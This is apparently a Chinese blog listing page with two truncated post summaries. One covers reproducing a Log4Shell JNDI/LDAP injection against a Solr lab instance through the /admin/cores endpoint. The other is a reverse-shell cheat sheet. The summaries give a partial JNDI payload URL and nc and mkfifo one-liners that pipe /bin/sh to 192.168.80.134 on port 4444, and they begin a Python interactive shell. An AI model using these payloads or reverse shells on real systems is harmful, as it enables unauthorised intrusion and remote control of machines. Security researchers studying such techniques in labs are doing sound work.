摘要:
1.启动漏洞环境 2.通过dnslog验证漏洞 先获取一个subdomain 3.可利用/admin/cores传参 4.构造payload 访问 http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java. 阅读全文
摘要:
Nc反弹shell nc -e 192.168.80.134 /bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 4444>/tmp/f Python交互式shell python3 -c 'i 阅读全文